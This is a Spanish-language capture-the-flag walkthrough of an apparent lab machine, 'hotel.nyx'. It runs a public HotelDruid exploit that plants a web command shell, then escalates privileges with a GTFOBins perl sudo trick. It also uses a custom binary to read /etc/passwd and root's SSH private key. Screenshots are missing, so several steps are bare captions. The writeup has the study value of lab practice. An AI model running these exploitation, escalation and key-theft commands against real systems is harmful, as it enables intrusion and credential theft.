Hacemos el escaneo de nmap:

Esto corre por el puerto 80:

Si lanzamos un whatweb nos encontramos con un email que nos indica un dominio:

Lo añadimos al archivo hosts:

Hacemos una búsqueda de subdominios con wfuzz y vemos el siguiente subdominio:

wfuzz -c --hc=404 --hl=616 -t 200 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.hotel.nyx" -u 192.168.0.28

Tenemos esta web que pone algo de hoteldruid:

Buscamos en github algún exploit y lo encontramos:

Probamos el exploit:

Y lo ejecutamos:

python3 exploit.py -t http://reservations.hotel.nyx/ --noauth

Vemos que ha insertado una CMD y nos pone justo la ruta para acceder a ella:

http://reservations.hotel.nyx/dati/selectappartamenti.php

Y ahora en este punto obtenemos una reverse shell url encodeada:

Y vemos que podemos ejecutar perl como el usuario sun:

Y ejecutamos el siguiente comando que podemos encontrar en gtfobins para convertirnos en el usuario sun:

sudo -u sun /usr/bin/perl -e 'exec "/bin/sh";'

Ahora si ejecutamos una búsqueda de binarios, nos llama la atención el binario de super:

Esto nos sale si lo ejecutamos:

Lo que nos hace pensar que al secret le podemos pasar algún archivo, por ejemplo el passwd, aunque se nos abre al reves:

/usr/bin/super secret /etc/passwd

Podemos leer el archivo id_rsa de root pasándole el comando rev para invertir el orden y así poder visualizarlo normal:

/usr/bin/super secret /root/.ssh/id_rsa | rev

Y ahora crackeamos este hash con john the ripper:

Y ahora podemos entrar ssh utilizando este salvoconducto: